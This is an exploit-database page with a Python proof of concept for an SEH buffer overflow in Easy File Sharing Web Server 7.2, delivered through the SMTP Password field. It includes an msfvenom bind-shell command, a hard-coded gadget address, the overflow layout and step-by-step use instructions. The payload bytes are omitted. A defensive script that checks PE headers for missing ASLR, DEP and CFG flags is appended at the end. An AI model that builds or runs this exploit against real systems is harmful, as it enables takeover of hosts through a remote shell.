0day.today - The World's Largest Exploit Database
Easy File Sharing Web Server 7.2 Local Buffer Overflow Exploit
```python
# Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow (SEH)
# Author: Felipe Winsnes
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open fsws.exe
# 4.- Go to 'Options'
# 5.- Click upon 'SMTP Setup'
# 6.- Paste clipboard on bottom-right 'Password' parameter
# 7.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/

import struct

# msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 718 bytes
buf = b""  # 718-byte msfvenom output (byte listing omitted)

# 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
seh = struct.pack("<I", 0x1002324C)

# Value that overwrites the next-SEH field, placed directly before the handler address
nseh = struct.pack("<I", 0x06710870)

# Layout: 512 filler bytes, the overwritten SEH record (nseh + seh), 20 bytes of padding,
# the payload, then 200 trailing bytes. Byte strings keep the output identical on Python 2 and 3.
buffer = b"A" * 512 + nseh + seh + b"A" * 20 + buf + b"\xff" * 200

with open("poc.txt", "wb") as f:
    f.write(buffer)

# 0day.today [2024-07-01] #
```
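The gadget note in the PoC records that ImageLoad.dll is loaded with ASLR and rebasing off, which is what keeps the hard-coded handler address valid across runs. As an added example (not part of the original exploit or the vendor's code), the defender-side check below reads the `DllCharacteristics` field of a PE header and lists the opt-in mitigations a module does not declare; the sample headers are constructed, and SafeSEH, which is recorded in the load-config directory rather than in this field, is not covered.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
FLAGS = {
    "DYNAMIC_BASE (ASLR)": 0x0040,
    "NX_COMPAT (DEP)": 0x0100,
    "GUARD_CF": 0x4000,
}

def dll_characteristics(image):
    """Return the DllCharacteristics field of a PE image after validating its headers."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    opt = e_lfanew + 4 + 20  # skip the "PE\0\0" signature and the 20-byte COFF header
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(image) < opt + 72:
        raise ValueError("missing or truncated PE header")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # The field sits at offset 70 of the optional header in both PE32 and PE32+
    return struct.unpack_from("<H", image, opt + 70)[0]

def missing_mitigations(image):
    """Names of the mitigations in FLAGS that the image does not declare."""
    value = dll_characteristics(image)
    return [name for name, bit in FLAGS.items() if not value & bit]

def sample_pe(characteristics):
    """Constructed minimal PE32 header carrying the given DllCharacteristics value."""
    img = bytearray(0x40 + 4 + 20 + 96)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)          # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", img, 0x58, 0x10B)         # optional header magic (PE32)
    struct.pack_into("<H", img, 0x58 + 70, characteristics)
    return bytes(img)

if __name__ == "__main__":
    # Constructed inputs: a module with no flags set and one with all three set
    for label, flags in (("legacy module", 0x0000), ("hardened module", 0x4140)):
        print(label, "->", missing_mitigations(sample_pe(flags)) or "none missing")
```

To audit an installation, pass the bytes of each `.exe` and `.dll` in the application directory to `missing_mitigations`.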